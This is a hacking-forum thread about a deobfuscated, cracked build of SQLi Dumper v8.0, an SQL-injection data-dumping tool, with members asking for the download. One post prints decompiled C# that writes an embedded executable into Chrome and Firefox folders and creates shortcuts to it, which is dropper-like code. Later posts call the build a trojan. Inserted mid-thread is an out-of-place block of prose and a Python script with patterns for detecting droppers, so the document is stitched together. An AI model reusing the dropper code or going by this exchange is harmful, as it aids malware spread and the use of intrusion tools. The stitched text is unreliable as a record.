Exposed source of SQLi Dumper v8.0

Discussion in 'General Discussion' started by Microsoft, Jun 7, 2015.

Thread Status:
Not open for further replies.
  1. Microsoft

    Microsoft Well-Known Member Legacy

    Messages:
    2,361
    Likes:
    2,510
    Ratio:
    1.44
    I've managed to deobfuscate the SQLi Dumper 8.0
    Someone with the right skills to find any malware inside it, shoot me a PM for the download.
     
    Dungvtp86 likes this.
  2. Bangerz

    Bangerz Basic Member

    Messages:
    1,111
    Likes:
    339
    Ratio:
    0.26
    SQLi 8.0 WOW.
     
  3. ProHex

    ProHex Banned

    Messages:
    12
    Likes:
    7
    Ratio:
    1
    Just checked it (thanks by the way!) and analyzed it.

    Everything is pretty much safe and clean.

    That's the only part that made me look out, but it seems it just integrates the Ask toolbar for the search function:
    Code:
    [MethodImpl(MethodImplOptions.NoOptimization)]
    private void Form1_Load(object sender, EventArgs e)
    {
        int num2;
        try
        {
            int num3;
        Label_0000:
            ProjectData.ClearProjectError();
            int num = 1;
        Label_0008:
            num3 = 2;
            string path = @"C:\Program Files (x86)\Google\Chrome\Application\Ask Toolbar Chrome.exe";
        Label_0011:
            num3 = 3;
            string str6 = @"C:\Program Files (x86)\Google\Chrome\Application\Ask Toolbar Chrome.lnk";
        Label_001B:
            num3 = 4;
            string directory = @"C:\Program Files (x86)\Google\Chrome\Application";
        Label_0025:
            num3 = 5;
            string str = @"C:\Program Files\Google\Chrome\Application\Ask Toolbar Chrome.exe";
        Label_002E:
            num3 = 6;
            string str3 = @"C:\Program Files\Google\Chrome\Application\Ask Toolbar Chrome.lnk";
        Label_0037:
            num3 = 7;
            string str2 = @"C:\Program Files\Google\Chrome\Application";
        Label_0040:
            num3 = 8;
            string str10 = @"C:\Program Files (x86)\Mozilla Firefox\Ask Toolbar Firefox.exe";
        Label_004A:
            num3 = 9;
            string str12 = @"C:\Program Files (x86)\Mozilla Firefox\Ask Toolbar Firefox.lnk";
        Label_0055:
            num3 = 10;
            string str11 = @"C:\Program Files (x86)\Mozilla Firefox";
        Label_0060:
            num3 = 11;
            string str7 = @"C:\Program Files\Mozilla Firefox\Ask Toolbar Firefox.exe";
        Label_006B:
            num3 = 12;
            string str9 = @"C:\Program Files\Mozilla Firefox\Ask Toolbar Firefox.lnk";
        Label_0076:
            num3 = 13;
            string str8 = @"C:\Program Files\Mozilla Firefox";
        Label_0081:
            num3 = 14;
            if (!MyProject.Computer.FileSystem.DirectoryExists(directory)) { goto Label_02BB; }
        Label_009B:
            num3 = 15;
            File.WriteAllBytes(path, SQLi_Dumper_v._8._0.My.Resources.Resources.Ask);
        Label_00AA:
            num3 = 0x10;
            object objectValue = RuntimeHelpers.GetObjectValue(Interaction.CreateObject("WScript.Shell", ""));
        Label_00C4:
            num3 = 0x11;
            objectValue = RuntimeHelpers.GetObjectValue(Interaction.CreateObject("WScript.Shell", ""));
        Label_00DE:
            num3 = 0x12;
            object[] arguments = new object[] { str6 };
            bool[] copyBack = new bool[] { true };
            if (copyBack[0]) { str6 = (string) Conversions.ChangeType(RuntimeHelpers.GetObjectValue(arguments[0]), typeof(string)); }
            object instance = RuntimeHelpers.GetObjectValue(NewLateBinding.LateGet(objectValue, null, "CreateShortcut", arguments, null, null, copyBack));
        Label_0140:
            num3 = 0x13;
            object[] objArray3 = new object[1];
            object[] objArray = new object[] { path };
            copyBack = new bool[] { true };
            if (copyBack[0]) { path = (string) Conversions.ChangeType(RuntimeHelpers.GetObjectValue(objArray[0]), typeof(string)); }
            objArray3[0] = RuntimeHelpers.GetObjectValue(NewLateBinding.LateGet(objectValue, null, "ExpandEnvironmentStrings", objArray, null, null, copyBack));
            NewLateBinding.LateSet(instance, null, "TargetPath", objArray3, null, null);
        Label_01BB:
            num3 = 20;
            objArray = new object[1];
            arguments = new object[] { path };
            copyBack = new bool[] { true };
            if (copyBack[0]) { path = (string) Conversions.ChangeType(RuntimeHelpers.GetObjectValue(arguments[0]), typeof(string)); }
     
    Dungvtp86, Truculent and Microsoft like this.
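The triage ProHex describes (scanning decompiled .NET source for an embedded-resource write followed by WScript.Shell shortcut creation into browser directories) can be turned into a small static check. The script below is an added example, not code from the thread or from the tool it discusses; it runs a handful of regex indicators over a constructed excerpt of the decompiled Form1_Load posted above and over a benign snippet, and reports a weighted score. The indicator names, weights and verdict thresholds are hypothetical choices for illustration, not a published scoring scheme.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: statements lifted from the decompiled Form1_Load
# posted in the thread, trimmed to the ones that matter for triage.
SAMPLE_DECOMPILED = r'''
string path = @"C:\Program Files (x86)\Google\Chrome\Application\Ask Toolbar Chrome.exe";
string str6 = @"C:\Program Files (x86)\Google\Chrome\Application\Ask Toolbar Chrome.lnk";
string str10 = @"C:\Program Files (x86)\Mozilla Firefox\Ask Toolbar Firefox.exe";
if (!MyProject.Computer.FileSystem.DirectoryExists(directory)) { goto Label_02BB; }
File.WriteAllBytes(path, SQLi_Dumper_v._8._0.My.Resources.Resources.Ask);
object objectValue = RuntimeHelpers.GetObjectValue(Interaction.CreateObject("WScript.Shell", ""));
object instance = RuntimeHelpers.GetObjectValue(NewLateBinding.LateGet(objectValue, null, "CreateShortcut", arguments, null, null, copyBack));
NewLateBinding.LateSet(instance, null, "TargetPath", objArray3, null, null);
'''

# Constructed benign sample for contrast: reads a config file, drops nothing.
BENIGN_SAMPLE = r'''
string cfg = @"C:\ProgramData\MyApp\settings.json";
string json = File.ReadAllText(cfg);
'''

# (name, regex, weight). Weights are a hypothetical triage scale chosen here.
INDICATORS = [
    # a file written from an embedded resource: payload carried inside the binary
    ("embedded_resource_write",
     re.compile(r'File\.WriteAllBytes\([^,]+,\s*[\w.]*Resources\.\w+\)'), 3),
    # late-bound WScript.Shell COM object, typical for shortcut creation
    ("wscript_shell_com", re.compile(r'CreateObject\("WScript\.Shell"'), 2),
    ("late_bound_shortcut", re.compile(r'"CreateShortcut"'), 2),
    ("shortcut_target_set", re.compile(r'"TargetPath"'), 1),
    # behaviour wired into the form's load handler, i.e. runs on every start
    ("form_load_hook", re.compile(r'Form1_Load\('), 1),
]

# C# verbatim string literals holding absolute Windows paths
PATH_RE = re.compile(r'@"([A-Za-z]:\\[^"]+)"')
# paths inside browser install directories (the ones the sample drops into)
BROWSER_DIR_RE = re.compile(r'\\(Google\\Chrome|Mozilla Firefox)\\', re.IGNORECASE)


@dataclass
class TriageResult:
    score: int = 0
    hits: list = field(default_factory=list)
    paths: list = field(default_factory=list)
    browser_paths: list = field(default_factory=list)

    @property
    def verdict(self) -> str:
        # thresholds are illustrative, tune them against your own corpus
        if self.score >= 5:
            return "dropper-like"
        if self.score > 0:
            return "suspicious"
        return "no dropper indicators"


def extract_paths(text: str) -> list:
    """Return the unique absolute paths found in verbatim string literals, in order."""
    seen = []
    for m in PATH_RE.finditer(text):
        p = m.group(1)
        if p not in seen:
            seen.append(p)
    return seen


def triage(text: str) -> TriageResult:
    """Score decompiled C# text against the dropper indicators above."""
    result = TriageResult()
    for name, pattern, weight in INDICATORS:
        if pattern.search(text):
            result.hits.append(name)
            result.score += weight
    result.paths = extract_paths(text)
    result.browser_paths = [p for p in result.paths if BROWSER_DIR_RE.search(p)]
    return result


def report(label: str, text: str) -> None:
    r = triage(text)
    print(f"[{label}] verdict={r.verdict} score={r.score} hits={r.hits}")
    for p in r.paths:
        tag = "browser-dir" if p in r.browser_paths else "other"
        print(f"    path ({tag}): {p}")


if __name__ == "__main__":
    report("decompiled sample", SAMPLE_DECOMPILED)
    report("benign sample", BENIGN_SAMPLE)
```

The point of the check is the combination, not any single match: a resource write on its own is common in installers, and WScript.Shell alone is common in automation code, but both together with shortcut creation into another vendor's install directory is the pattern worth a closer look before running a cracked build.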
  4. Onlykl

    Onlykl Member

    Messages:
    363
    Likes:
    108
    Ratio:
    0.11
    Send it over Microsoft please?
     
  5. seNs

    seNs Active Member

    Messages:
    970
    Likes:
    664
    Ratio:
    1.06
    May I get it as well please? And does Google work on it, because on v7 it's not anymore :(
     
  6. Caskey

    Caskey New Member

    Messages:
    230
    Likes:
    118
    Ratio:
    0.49
    seNs likes this.
  7. seNs

    seNs Active Member

    Messages:
    970
    Likes:
    664
    Ratio:
    1.06
  8. Caskey

    Caskey New Member

    Messages:
    230
    Likes:
    118
    Ratio:
    0.49
    Ya, the only thing I really notice different is that it's detected to contain a trojan.

     
  9. Microsoft

    Microsoft Well-Known Member Legacy

    Messages:
    2,361
    Likes:
    2,510
    Ratio:
    1.44
    Let's all just forget about this version 8.
    It appears to be infected like many say.
    Version 7 contains Google but it's patched somehow; the same thing counts for v8, although v8 is a trojan.
     